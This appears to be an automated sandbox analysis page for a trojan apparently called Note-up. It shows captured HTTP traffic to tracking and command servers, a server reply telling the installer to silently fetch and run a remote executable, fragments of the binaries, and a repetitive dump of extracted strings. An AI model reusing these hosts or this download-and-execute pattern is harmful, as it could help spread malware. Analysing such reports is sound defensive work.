{"table": "event_has_user","data": "{\"event_event_id\": \"3650\",\"guid\": \"D0344D56-9B40-DA1F-4A65-5000DA5C9464\",\"channel_id\": \"\", \"utm_addition\":\"dloc_stage=9&command_parameters=/ch= /start /p=NU&vostage=main&pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:20 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 250
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"3652\",\"guid\": \"D0344D56-9B40-DA1F-4A65-5000DA5C9464\",\"channel_id\": \"\", \"utm_addition\":\"dloc_stage=10&command_parameters=/ch= /start /p=NU&vostage=main&pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:20 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Mon, 26 Oct 2015 07:18:20 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 262
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"3654\",\"guid\": \"D0344D56-9B40-DA1F-4A65-5000DA5C9464\",\"channel_id\": \"\", \"utm_addition\":\"dloc_stage=12&command_parameters=/ch= /start /p=NU&vostage=main&reason=vmwa&pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:21 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 250
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"3655\",\"guid\": \"D0344D56-9B40-DA1F-4A65-5000DA5C9464\",\"channel_id\": \"\", \"utm_addition\":\"dloc_stage=13&command_parameters=/ch= /start /p=NU&vostage=main&pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:21 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 257
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"3675\",\"guid\": \"D0344D56-9B40-DA1F-4A65-5000DA5C9464\",\"channel_id\": \"\", \"utm_addition\":\"dloc_stage=21&command_parameters=/ch= /start /p=NU&vostage=main&dloc=1&pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:21 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 223
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"2066\",\"guid\": \"D0344D56-9B40-DA1F-4A65-5000DA5C9464\",\"channel_id\": \"\", \"utm_addition\":\"command_parameters=/ch= /start /p=NU&pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:21 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 223
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"3510\",\"guid\": \"D0344D56-9B40-DA1F-4A65-5000DA5C9464\",\"channel_id\": \"\", \"utm_addition\":\"command_parameters=/ch= /start /p=NU&pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:21 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 186
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"3534\",\"guid\": \"D0344D56-9B40-DA1F-4A65-5000DA5C9464\",\"channel_id\": \"\", \"utm_addition\":\"pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:22 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Mon, 26 Oct 2015 07:18:22 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 186
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"3638\",\"guid\": \"D0344D56-9B40-DA1F-4A65-5000DA5C9464\",\"channel_id\": \"\", \"utm_addition\":\"pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:27 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 186
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"3637\",\"guid\": \"D0344D56-9B40-DA1F-4A65-5000DA5C9464\",\"channel_id\": \"\", \"utm_addition\":\"pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:27 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 186
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"3502\",\"guid\": \"D0344D56-9B40-DA1F-4A65-5000DA5C9464\",\"channel_id\": \"\", \"utm_addition\":\"pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:27 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 186
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"3503\",\"guid\": \"D0344D56-9B40-DA1F-4A65-5000DA5C9464\",\"channel_id\": \"\", \"utm_addition\":\"pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:27 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 186
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"3504\",\"guid\": \"D0344D56-9B40-DA1F-4A65-5000DA5C9464\",\"channel_id\": \"\", \"utm_addition\":\"pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:27 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 186
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"3505\",\"guid\": \"D0344D56-9B40-DA1F-4A65-5000DA5C9464\",\"channel_id\": \"\", \"utm_addition\":\"pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:28 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Mon, 26 Oct 2015 07:18:28 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 186
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"3506\",\"guid\": \"D0344D56-9B40-DA1F-4A65-5000DA5C9464\",\"channel_id\": \"\", \"utm_addition\":\"pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:28 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 186
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"3507\",\"guid\": \"D0344D56-9B40-DA1F-4A65-5000DA5C9464\",\"channel_id\": \"\", \"utm_addition\":\"pr=vo&v=39&civ=2&pac=NU\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:28 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Mon, 26 Oct 2015 07:18:28 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}..
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:18 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 122
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NU\", \"utm_addition\":\"tst=&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:18 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Mon, 26 Oct 2015 07:18:18 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 170
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NU\", \"utm_addition\":\"url=hXXp://download-servers.com/SysInfo/Validate.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:19 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Mon, 26 Oct 2015 07:18:19 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 183
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NU\", \"utm_addition\":\"url=hXXp://download-servers.com/SysInfo/Validate.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Oct 2015 07:18:19 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}..
GET /Generic/vos.php?ch=NU&rdsn=0&idn=0&sid=&isnw=2&civ=2&or=st&pac=NU&guidv=2&vpname=&prdk=&tst= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 26 Oct 2015 07:18:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.21
37..hXXp://download-servers.com/SysInfo/Validate.exe.. /s..0..HTTP/1.1 200 OK..Server: nginx..Date: Mon, 26 Oct 2015 07:18:19 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Vary: Accept-Encoding..X-Powered-By: PHP/5.5.21..37..hXXp://download-servers.com/SysInfo/Validate.exe.. /s..0..
GET /countstats/count.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 26 Oct 2015 07:18:07 GMT
Content-Type: application/octet-stream
Content-Length: 202653
Connection: keep-alive
X-Powered-By: PHP/5.5.21
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=check.exe
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@...........................4..............................................s.......04..C...........................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata....1..@...........................rsrc....C...04..D...v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /vuupc/stats.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 26 Oct 2015 07:18:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.21
e..14854413907LP6..0..HTTP/1.1 200 OK..Server: nginx..Date: Mon, 26 Oct 2015 07:18:27 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Vary: Accept-Encoding..X-Powered-By: PHP/5.5.21..e..14854413907LP6..0..
GET /Note-UP_Setup.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d16hr9n7t75k58.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 2481833
Connection: keep-alive
Date: Fri, 09 Oct 2015 08:09:06 GMT
Last-Modified: Fri, 09 Oct 2015 08:01:56 GMT
ETag: "583e342e2d7bbd98a5a4ab760654a0c8"
Accept-Ranges: bytes
Server: AmazonS3
Age: 54991
X-Cache: Hit from cloudfront
Via: 1.1 1215b20e825091002cc9421604422697.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 2ovQjRoxFd4xAduE4LTaKRhGCFQImjunUAqqHeFUl8NKTOMfCf2JGA==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t..........xU...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc...xU.......V...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
Note-up.exe_380:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
uDPj0
uDPj0
u u
u u
f;P.sB
f;P.sB
@.PQj9
@.PQj9
f;A.sK
f;A.sK
.6.78.9:;
.6.78.9:;
B.CDEFFG
B.CDEFFG
] ;^ }6
] ;^ }6
u%SSh
u%SSh
9>t.hD
9>t.hD
tFHt:Ht.Ht"Hu`
tFHt:Ht.Ht"Hu`
SSSSh
SSSSh
j%XtL9E
j%XtL9E
tWSShW
tWSShW
tl9_ tgSSh
tl9_ tgSSh
t'SShl
t'SShl
FTCP
FTCP
u.Ph$
u.Ph$
tAHt.HHt
tAHt.HHt
SSh@B
SSh@B
FtPW
FtPW
u$SShe
u$SShe
s%j.Zf
s%j.Zf
xSSSh
xSSSh
FTPjKS
FTPjKS
FtPj;S
FtPj;S
C.PjRV
C.PjRV
large file support is disabled
large file support is disabled
unknown operation
unknown operation
SQL logic error or missing database
SQL logic error or missing database
foreign_keys
foreign_keys
foreign_key_list
foreign_key_list
foreign_key_check
foreign_key_check
defer_foreign_keys
defer_foreign_keys
sqlite_compileoption_get
sqlite_compileoption_get
sqlite_compileoption_used
sqlite_compileoption_used
sqlite_log
sqlite_log
sqlite_source_id
sqlite_source_id
sqlite_version
sqlite_version
sqlite_attach
sqlite_attach
sqlite_detach
sqlite_detach
sqlite_stat4
sqlite_stat4
sqlite_stat3
sqlite_stat3
sqlite_stat1
sqlite_stat1
sqlite_rename_parent
sqlite_rename_parent
sqlite_rename_trigger
sqlite_rename_trigger
sqlite_rename_table
sqlite_rename_table
FOREIGN KEY
FOREIGN KEY
GetProcessHeap
GetProcessHeap
RowKey
RowKey
3.8.10.2
3.8.10.2
SQLite format 3
SQLite format 3
CREATE TABLE sqlite_master(
CREATE TABLE sqlite_master(
sql text
sql text
CREATE TEMP TABLE sqlite_temp_master(
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYWITHOUTERELEASEATTACHAVINGROUPDATEBEGINNERECURSIVEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTRIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYWITHOUTERELEASEATTACHAVINGROUPDATEBEGINNERECURSIVEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTRIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
922337203685477580
922337203685477580
SQLITE_
SQLITE_
%s(%d)
%s(%d)
sqlite_master
sqlite_master
sqlite_temp_master
sqlite_temp_master
?API call with %s database connection pointer
?API call with %s database connection pointer
os_win.c:%d: (%lu) %s(%s) - %s
os_win.c:%d: (%lu) %s(%s) - %s
delayed %dms for lock/sharing conflict at line %d
delayed %dms for lock/sharing conflict at line %d
%s%c%s
%s%c%s
cannot limit WAL size: %s
cannot limit WAL size: %s
2nd reference to page %d
2nd reference to page %d
invalid page number %d
invalid page number %d
unable to use function %s in the requested context
unable to use function %s in the requested context
zeroblob(%d)
zeroblob(%d)
%s prohibited in partial index WHERE clauses
%s prohibited in partial index WHERE clauses
%s prohibited in CHECK constraints
%s prohibited in CHECK constraints
%r %s BY term out of range - should be between 1 and %d
%r %s BY term out of range - should be between 1 and %d
Expression tree is too large (maximum depth %d)
Expression tree is too large (maximum depth %d)
too many SQL variables
too many SQL variables
variable number must be between ?1 and ?%d
variable number must be between ?1 and ?%d
too many columns in %s
too many columns in %s
hex literal too big: %s
hex literal too big: %s
%.*s"%w"%s
%.*s"%w"%s
%s%.*s"%w"
%s%.*s"%w"
%s OR name=%Q
%s OR name=%Q
type='trigger' AND (%s)
type='trigger' AND (%s)
table %s may not be altered
table %s may not be altered
sqlite_
sqlite_
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
%s cannot use variables
%s cannot use variables
access to %s.%s.%s is prohibited
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
access to %s.%s is prohibited
%s: %s
%s: %s
%s: %s.%s
%s: %s.%s
object name reserved for internal use: %s
object name reserved for internal use: %s
duplicate column name: %s
duplicate column name: %s
too many columns on %s
too many columns on %s
default value of column [%s] is not constant
default value of column [%s] is not constant
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
DELETE FROM %Q.%s WHERE %s=%Q
DELETE FROM %Q.%s WHERE %s=%Q
sqlite_stat%d
sqlite_stat%d
unknown column "%s" in foreign key definition
unknown column "%s" in foreign key definition
number of columns in foreign key does not match the number of columns in the referenced table
number of columns in foreign key does not match the number of columns in the referenced table
foreign key on %s should reference only one column of table %T
foreign key on %s should reference only one column of table %T
a JOIN clause is required before %s
a JOIN clause is required before %s
%s.rowid
%s.rowid
%s.%s
%s.%s
duplicate WITH table name: %s
duplicate WITH table name: %s
no such collation sequence: %s
no such collation sequence: %s
cannot modify %s because it is a view
cannot modify %s because it is a view
table %s may not be modified
table %s may not be modified
foreign key mismatch - "%w" referencing "%w"
foreign key mismatch - "%w" referencing "%w"
FOREIGN KEY constraint failed
FOREIGN KEY constraint failed
error during initialization: %s
error during initialization: %s
no entry point [%s] in shared library [%s]
no entry point [%s] in shared library [%s]
sqlite3_
sqlite3_
unable to open shared library [%s]
unable to open shared library [%s]
sqlite3_extension_init
sqlite3_extension_init
automatic extension loading failed: %s
automatic extension loading failed: %s
unknown or unsupported join type: %T %T%s%T
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
RIGHT and FULL OUTER JOINs are not currently supported
cannot join using column %s - column not present in both tables
cannot join using column %s - column not present in both tables
cannot have both ON and USING clauses in the same join
cannot have both ON and USING clauses in the same join
a NATURAL join may not have an ON or USING clause
a NATURAL join may not have an ON or USING clause
USE TEMP B-TREE FOR %s
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
COMPOUND SUBQUERIES %d AND %d %s(%s)
column%d
column%d
%s:%d
%s:%d
SELECTs to the left and right of %s do not have the same number of result columns
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
no such index: %s
recursive reference in a subquery: %s
recursive reference in a subquery: %s
multiple recursive references: %s
multiple recursive references: %s
table %s has %d values for %d columns
table %s has %d values for %d columns
circular reference: %s
circular reference: %s
multiple references to recursive table: %s
multiple references to recursive table: %s
SCAN TABLE %s%s%s
